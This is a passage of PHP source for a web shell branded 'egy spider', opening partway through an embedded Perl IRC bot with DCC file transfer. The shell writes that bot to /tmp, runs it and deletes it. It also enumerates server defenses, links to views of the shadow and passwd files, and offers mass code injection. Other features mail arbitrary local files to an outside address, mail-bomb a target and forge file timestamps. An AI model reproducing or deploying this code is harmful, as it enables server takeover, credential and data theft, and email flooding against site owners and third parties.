sendraw(\"PRIVMSG \$_[0] :\$_[1]\"); +} + + +sub notice { + return unless $#_ == 1; + sendraw(\"NOTICE \$_[0] :\$_[1]\"); +} + + +sub op { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +o \$_[1]\"); +} +sub deop { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] -o \$_[1]\"); +} +sub hop { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +h \$_[1]\"); +} +sub dehop { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +h \$_[1]\"); +} +sub voice { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +v \$_[1]\"); +} +sub devoice { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] -v \$_[1]\"); +} +sub ban { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +b \$_[1]\"); +} +sub unban { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] -b \$_[1]\"); +} +sub kick { + return unless $#_ == 1; + sendraw(\"KICK \$_[0] \$_[1] :\$_[2]\"); +} + + +sub modo { + return unless $#_ == 0; + sendraw(\"MODE \$_[0] \$_[1]\"); +} +sub mode { modo(@_); } + + +sub j { &join(@_); } +sub join { + return unless $#_ == 0; + sendraw(\"JOIN \$_[0]\"); +} +sub p { part(@_); } +sub part {sendraw(\"PART \$_[0]\");} + + +sub nick { + return unless $#_ == 0; + sendraw(\"NICK \$_[0]\"); +} + + +sub invite { + return unless $#_ == 1; + sendraw(\"INVITE \$_[1] \$_[0]\"); +} +sub topico { + return unless $#_ == 1; + sendraw(\"TOPIC \$_[0] \$_[1]\"); +} +sub topic { topico(@_); } + + +sub whois { + return unless $#_ == 0; + sendraw(\"WHOIS \$_[0]\"); +} +sub who { + return unless $#_ == 0; + sendraw(\"WHO \$_[0]\"); +} +sub names { + return unless $#_ == 0; + sendraw(\"NAMES \$_[0]\"); +} +sub away { + sendraw(\"AWAY \$_[0]\"); +} +sub back { away(); } +sub quit { + sendraw(\"QUIT :\$_[0]\"); +} + + +# DCC +######################### + + +package DCC; + + +sub connections { + my @ready = \$dcc_sel->can_read(1); +# return unless (@ready); + foreach my \$fh (@ready) { + my \$dcctipo = \$DCC{\$fh}{tipo}; + my \$arquivo = \$DCC{\$fh}{arquivo}; + my \$bytes = \$DCC{\$fh}{bytes}; + my \$cur_byte = \$DCC{\$fh}{curbyte}; + my \$nick = \$DCC{\$fh}{nick}; + + + + + my \$msg; + my \$nread = sysread(\$fh, \$msg, 10240); + + + if (\$nread == 0 and \$dcctipo =~ /^(get|sendcon)$/) { + \$DCC{\$fh}{status} = \"Cancelado\"; + \$DCC{\$fh}{ftime} = time; + \$dcc_sel->remove(\$fh); + \$fh->close; + next; + } + + + if (\$dcctipo eq \"get\") { + \$DCC{\$fh}{curbyte} += length(\$msg); + + + my \$cur_byte = \$DCC{\$fh}{curbyte}; + + + open(FILE, \">> \$arquivo\"); + print FILE \"\$msg\" if (\$cur_byte <= \$bytes); + close(FILE); + + + my \$packbyte = pack(\"N\", \$cur_byte); + print \$fh \"\$packbyte\"; + + + + + if (\$bytes == \$cur_byte) { + \$dcc_sel->remove(\$fh); + \$fh->close; + \$DCC{\$fh}{status} = \"Recebido\"; + \$DCC{\$fh}{ftime} = time; + next; + } + } elsif (\$dcctipo eq \"send\") { + my \$send = \$fh->accept; + \$send->autoflush(1); + \$dcc_sel->add(\$send); + \$dcc_sel->remove(\$fh); + \$DCC{\$send}{tipo} = 'sendcon'; + \$DCC{\$send}{itime} = time; + \$DCC{\$send}{nick} = \$nick; + \$DCC{\$send}{bytes} = \$bytes; + \$DCC{\$send}{curbyte} = 0; + \$DCC{\$send}{arquivo} = \$arquivo; + \$DCC{\$send}{ip} = \$send->peerhost; + \$DCC{\$send}{porta} = \$send->peerport; + \$DCC{\$send}{status} = \"Enviando\"; + #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon + open(FILE, \"< \$arquivo\"); + my \$fbytes; + read(FILE, \$fbytes, 1024); + print \$send \"\$fbytes\"; + close FILE; +# delete(\$DCC{\$fh}); +} elsif (\$dcctipo eq 'sendcon') { + my \$bytes_sended = unpack(\"N\", \$msg); + \$DCC{\$fh}{curbyte} = \$bytes_sended; + if (\$bytes_sended == \$bytes) { + \$fh->close; + \$dcc_sel->remove(\$fh); + \$DCC{\$fh}{status} = \"Enviado\"; + \$DCC{\$fh}{ftime} = time; + next; + } + open(SENDFILE, \"< \$arquivo\"); + seek(SENDFILE, \$bytes_sended, 0); + my \$send_bytes; + read(SENDFILE, \$send_bytes, 1024); + print \$fh \"\$send_bytes\"; + close(SENDFILE); + } + } +} +########################## + + +sub SEND { + my (\$nick, \$arquivo) = @_; + unless (-r \"\$arquivo\") { + return(0); + } + + + my \$dccark = \$arquivo; + \$dccark =~ s/[.*\/](\S+)/$1/; + + + my \$meuip = $::irc_servers{\"$::IRC_cur_socket\"}{'meuip'}; + my \$longip = unpack(\"N\",inet_aton(\$meuip)); + + + my @filestat = stat(\$arquivo); + my \$size_total=\$filestat[7]; + if (\$size_total == 0) { + return(0); + } + + + my (\$porta, \$sendsock); + do { + \$porta = int rand(64511); + \$porta += 1024; + \$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>\$porta, Proto => 'tcp') and \$dcc_sel->add(\$sendsock); + } until \$sendsock; + + + \$DCC{\$sendsock}{tipo} = 'send'; + \$DCC{\$sendsock}{nick} = \$nick; + \$DCC{\$sendsock}{bytes} = \$size_total; + \$DCC{\$sendsock}{arquivo} = \$arquivo; + + + &::ctcp(\"\$nick\", \"DCC SEND \$dccark \$longip \$porta \$size_total\"); + + +} + + +sub GET { + my (\$arquivo, \$dcclongip, \$dccporta, \$bytes, \$nick) = @_; + return(0) if (-e \"\$arquivo\"); + if (open(FILE, \"> \$arquivo\")) { + close FILE; + } else { + return(0); + } + + + my \$dccip=fixaddr(\$dcclongip); + return(0) if (\$dccporta < 1024 or not defined \$dccip or \$bytes < 1); + my \$dccsock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\$dccip, PeerPort=>\$dccporta, Timeout=>15) or return (0); + \$dccsock->autoflush(1); + \$dcc_sel->add(\$dccsock); + \$DCC{\$dccsock}{tipo} = 'get'; + \$DCC{\$dccsock}{itime} = time; + \$DCC{\$dccsock}{nick} = \$nick; + \$DCC{\$dccsock}{bytes} = \$bytes; + \$DCC{\$dccsock}{curbyte} = 0; + \$DCC{\$dccsock}{arquivo} = \$arquivo; + \$DCC{\$dccsock}{ip} = \$dccip; + \$DCC{\$dccsock}{porta} = \$dccporta; + \$DCC{\$dccsock}{status} = \"Recebendo\"; +} +############################ +# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas +sub Status { + my \$socket = shift; + my \$sock_tipo = \$DCC{\$socket}{tipo}; + unless (lc(\$sock_tipo) eq \"chat\") { + my \$nick = \$DCC{\$socket}{nick}; + my \$arquivo = \$DCC{\$socket}{arquivo}; + my \$itime = \$DCC{\$socket}{itime}; + my \$ftime = time; + my \$status = \$DCC{\$socket}{status}; + \$ftime = \$DCC{\$socket}{ftime} if defined(\$DCC{\$socket}{ftime}); + + + my \$d_time = \$ftime-\$itime; + + + my \$cur_byte = \$DCC{\$socket}{curbyte}; + my \$bytes_total = \$DCC{\$socket}{bytes}; + + + my \$rate = 0; + \$rate = (\$cur_byte/1024)/\$d_time if \$cur_byte > 0; + my \$porcen = (\$cur_byte*100)/\$bytes_total; + + + my (\$r_duv, \$p_duv); + if (\$rate =~ /^(\d+)\.(\d)(\d)(\d)/) { + \$r_duv = $3; \$r_duv++ if $4 >= 5; + \$rate = \"$1\.$2\".\"\$r_duv\"; + } + if (\$porcen =~ /^(\d+)\.(\d)(\d)(\d)/) { + \$p_duv = $3; \$p_duv++ if $4 >= 5; + \$porcen = \"$1\.$2\".\"\$p_duv\"; + } + return(\"\$sock_tipo\",\"\$status\",\"\$nick\",\"\$arquivo\",\"\$bytes_total\", \"\$cur_byte\",\"\$d_time\", \"\$rate\", \"\$porcen\"); + } + + + return(0); +} + + +# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor) +sub fixaddr { + my (\$address) = @_; + + + chomp \$address; # just in case, sigh. + if (\$address =~ /^\d+$/) { + return inet_ntoa(pack \"N\", \$address); + } elsif (\$address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) { + return \$address; + } elsif (\$address =~ tr/a-zA-Z//) { # Whee! Obfuscation! + return inet_ntoa(((gethostbyname(\$address))[4])[0]); + } else { + return; + } +} +############################ +"; +$bot = "/tmp/ircs.pl"; +$open = fopen($bot,"w"); +fputs($open,$file); +fclose($open); +$cmd="perl $bot"; +$cmd2="rm $bot"; +system($cmd); +system($cmd2); +$_POST['cmd']="echo \"Now script try connect to ircserver ...\""; + + +} + + + + +if(!isset($_COOKIE[$lang[$language.'_text137']])) { + $ust_u=''; + if($unix && !$safe_mode){ + foreach ($userful as $item) { + if(which($item)){$ust_u.=$item;} + } + } + if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$ust_u.=", mod_perl";} + if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$ust_u.=", mod_include(SSI)";} + if (@function_exists('pcntl_exec')) {$ust_u.=", pcntl_exec";} + if (@extension_loaded('win32std')) {$ust_u.=", win32std_loaded";} + if (@extension_loaded('win32service')) {$ust_u.=", win32service_loaded";} + if (@extension_loaded('ffi')) {$ust_u.=", ffi_loaded";} + if (@extension_loaded('perl')) {$ust_u.=", perl_loaded";} + if(substr($ust_u,0,1)==",") {$ust_u[0]="";} + + $ust_u = trim($ust_u); +}else { + $ust_u = trim($_COOKIE[$lang[$language.'_text137']]); +} + + +if(!isset($_COOKIE[$lang[$language.'_text138']])) { + $ust_d=''; + if($unix && !$safe_mode){ + foreach ($danger as $item) { + if(which($item)){$ust_d.=$item;} + } + } + if(!$safe_mode){ + foreach ($danger as $item) { + if(ps($item)){$ust_d.=$item;} + } + } + if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {$ust_d.=", mod_security";} + if(substr($ust_d,0,1)==",") {$ust_d[0]="";} + + $ust_d = trim($ust_d); +}else { + $ust_d = trim($_COOKIE[$lang[$language.'_text138']]); +} + + +if(!isset($_COOKIE[$lang[$language.'_text142']])) { + + + $select_downloaders='<select size="1" name=with>'; + if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('file'))){$select_downloaders .= "<option value=\"fopen\">fopen</option>";$downloader="fopen";} + if($unix && !$safe_mode){ + foreach ($downloaders as $item) { + if(which($item)){$select_downloaders .= '<option value="'.$item.'">'.$item.'</option>';$downloader.=", $item";} + } + } + $select_downloaders .= '</select>'; + if(substr($downloader,0,1)==",") {$downloader[0]="";} + + $downloader=trim($downloader); + + +} + + + + +echo $head; +echo '</head>'; + + +echo '<<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#dadada><tr><td bgcolor=#000000 width=120><font face=Comic Sans MS size=1>'.ws(2).'<DIV dir=ltr align=center><p><font style="font-weight: 500" face="Webdings" color="#800000" size="7">!</font></p>'.ws(2).'<DIV dir=ltr align=center><SPAN +style="FILTER: blur(add=1,direction=10,strength=25); HEIGHT: 25px"> +<SPAN +style="FONT-SIZE: 15pt; COLOR: white; FONT-FAMILY: Impact">egy spider</P></SPAN></DIV></font></b></font></td><td bgcolor=#000000><font face=tahoma size=1>'. + + +'</center></font>'.$fe.'</td>'.'<td bgcolor=#333333><font face=#FFFFFF size=-2>'; +echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]"; +echo " X_FORWARDED_FOR:"; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){echo "[<font color=red>".$_SERVER['HTTP_X_FORWARDED_FOR']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";} +echo " CLIENT_IP: ";if(isset($_SERVER['HTTP_CLIENT_IP'])){echo "[<font color=red>".$_SERVER['HTTP_CLIENT_IP']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";} +echo " Server IP: [<font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font>]"; + + +echo "<br>"; + + +echo ws(2)."PHP Version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: <b>".(($curl_on)?("<font color=red>ON</font>"):("<font color=green>OFF</font>")); +echo "</b>".ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=red>ON</font>"; } else { echo "<font color=green>OFF</font>"; } +echo "</b>".ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "MySQLi: <b>"; +$mysqli_on = @function_exists('mysqli_connect'); +if($mysqli_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "MSQL: <b>"; +$msql_on = @function_exists('msql_connect'); +if($msql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "SQLite: <b>"; +$sqlite_on = @function_exists('sqlite_open'); +if($sqlite_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b><br>".ws(2); + + +echo "Safe_Mode: <b>"; +echo (($safe_mode)?("<font color=red>ON</font>"):("<font color=green>OFF</font>")); +echo "</b>".ws(2); +echo "Open_Basedir: <b>"; +if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=red>$df</font></b>";};} +else {echo "<font color=green>NONE</font></b>";} +echo ws(2)."Safe_Exec_Dir: <b>"; +if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} +else {echo "<font color=red>ini_get disable!</font></b>";} +echo ws(2)."Safe_Gid: <b>"; +if(@function_exists('ini_get')) { if (@ini_get('safe_mode_gid')) {echo "<font color=green>ON</font></b>";}else {echo "<font color=red>OFF</font></b>";};} +else {echo "<font color=red>ini_get disable!</font></b>";} +echo ws(2)."Safe_Include_Dir: <b>"; +if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} +else {echo "<font color=red>ini_get disable!</font></b>";} +echo ws(2)."Sql.safe_mode: <b>"; +if(@function_exists('ini_get')) { if (@ini_get('sql.safe_mode')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=green>OFF</font></b>";};} +else {echo "<font color=red>ini_get disable!</font></b>";} + + +echo "<br>".ws(2); +echo "Disable Functions : <b>";$df='ini_get disable!'; +if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} + + +if(@function_exists('diskfreespace')){$free = @diskfreespace($dir);} +elseif(@function_exists('disk_free_space')){$free = @disk_free_space($dir);}else{$free = 'Unknown';} +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +echo "<br>".ws(2)."Free Space : <b>".view_size($free)."</b> Total Space: <b>".view_size($all)."</b>"; + + + + +if($ust_u){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust_u."</font>";}; + + +if($ust_d){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>".$ust_d."</font>";}; + + +if($downloader){echo "<br>".ws(2).$lang[$language.'_text142'].": <font color=blue>".$downloader."</font>";}; + + + + +echo "<br>".ws(2)."</b>"; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?' title=\"".$lang[$language.'_text160']."\"><b>Home</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?egy' title=\"".$lang[$language.'_text159']."\"><b>About EgY SpIdEr</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?news' title=\"".$lang[$language.'_text152']."\"><b>News</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?logout=1' title=\"".$lang[$language.'_text153']."\"><b>Logout</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=feedback' title=\"".$lang[$language.'_text180']."\"><b>Feedback & Contact Me </b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=qindx' title=\"".$lang[$language.'_text154']."\"><b>Quick index </b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=massbrowsersploit' title=\"".$lang[$language.'_text155']."\"><b>Mass Code Injection</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=showsrc' title=\"".$lang[$language.'_text156']."\"><b>File source </b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=zone' title=\"".$lang[$language.'_text157']."\"><b>Zone-h</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=encoder' title=\"".$lang[$language.'_text158']."\"><b>Hash Tools</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?1' title=\"".$lang[$language.'_text46']."\"><b>PhpInfo</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?2' title=\"".$lang[$language.'_text47']."\"><b>Php.Ini</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?3' title=\"".$lang[$language.'_text50']."\"><b>Cpu</b></a> ".$rb; +if(!$unix) { + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?5' title=\"".$lang[$language.'_text50']."\"><b>SystemInfo</b></a> ".$rb; +}else{ + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?6' title=\"View syslog.conf\"><b>Syslog</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?7' title=\"View resolv\"><b>Resolv</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?8' title=\"View hosts\"><b>Hosts</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?9' title=\"View shadow\"><b>Shadow</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?10' title=\"".$lang[$language.'_text95']."\"><b>Passwd</b></a> ".$rb; +} +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?11' title=\"".$lang[$language.'_text48']."\"><b>Tmp</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?12' title=\"".$lang[$language.'_text49']."\"><b>Delete</b></a> ".$rb; + + +if($unix && !$safe_mode) +{ + echo "<br>".ws(2)."</b>"; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?13' title=\"View procinfo\"><b>Procinfo</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?14' title=\"View proc version\"><b>Version</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?15' title=\"View mem free\"><b>Free</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?16' title=\"View dmesg\"><b>Dmesg</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?17' title=\"View vmstat\"><b>Vmstat</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?18' title=\"View lspci\"><b>lspci</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?19' title=\"View lsdev\"><b>lsdev</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?20' title=\"View interrupts\"><b>Interrupts</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?21' title=\"View realise1\"><b>Realise1</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?22' title=\"View realise2\"><b>Realise2</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?23' title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb; + + + echo "<br>".ws(2)."</b>"; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?24' title=\"View w\"><b>W</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?25' title=\"View who\"><b>Who</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?26' title=\"View uptime\"><b>Uptime</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?27' title=\"View last -n 10\"><b>Last</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?28' title=\"View ps -aux\"><b>Ps Aux</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?29' title=\"View service\"><b>Service</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?30' title=\"View ifconfig\"><b>Ifconfig</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?31' title=\"View netstat -a\"><b>Netstat</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?32' title=\"View fstab\"><b>Fstab</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?33' title=\"View fdisk -l\"><b>Fdisk</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?34' title=\"View df -h\"><b>df -h</b></a> ".$rb; +} + + +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; + + +if($unix){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +if(!empty($id)) { echo ws(3).$id."<br>"; } +else if(@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid')) + { + $euserinfo = @posix_getpwuid(@posix_geteuid()); + $egroupinfo = @posix_getgrgid(@posix_getegid()); + echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>'; + } +else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"; +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@getenv("USERNAME")."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; + + + + +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n"); + err(6+$res); + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if($file=moreread($_POST['loc_file'])){ $filedump = $file; } + else if ($file=readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1,$_POST['loc_file']); $_POST['cmd']=""; } + if(!empty($_POST['cmd'])) + { + $filename = @basename($_POST['loc_file']); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from egy spider shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'egy_spider@hotmail.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + err(6+$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size'])) + { + for($h=1;$h<=$_POST['mail_flood'];$h++){ + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ", 1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n"); + } + err(6+$res); + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(@file_exists($_POST['mk_name']) || !morewrite($_POST['mk_name'],'your text here')) { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + else { + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(@unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(@mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } + + + + +if(!empty($_POST['cmd']) && $_POST['cmd']=="touch") +{ +if(!$_POST['file_name_r']) + { + $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds"; + $datar = @strtotime($datar); + @touch($_POST['file_name'],$datar,$datar);} +else{ + @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r'])); +} +$_POST['cmd']=""; +} + + + + +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(@is_dir($_POST['e_name'])){ err(1,$_POST['e_name']); $_POST['cmd']=""; } + elseif($file=moreread($_POST['e_name'])) { $filedump = $file; if(!@is_writable($_POST['e_name'])) { $only_read = 1; }; } + elseif($file=readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; } + elseif(@file_exists($_POST['e_name'])) {$filedump = 'NONE'; if(!@is_writable($_POST['e_name'])) { $only_read = 1; };} + else { err(1,$_POST['e_name']); $_POST['cmd']=""; } + if(!empty($_POST['cmd'])) + { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars($filedump); + echo "</textarea>"; + echo "<input type=hidden name=e_name value='".$_POST['e_name']."'>"; + echo "<input type=hidden name=dir value='".$dir."'>"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + $mtime = @filemtime($_POST['e_name']); + if(!@is_writable($_POST['e_name'])) { err(0,$_POST['e_name']); } + else { + if($unix) 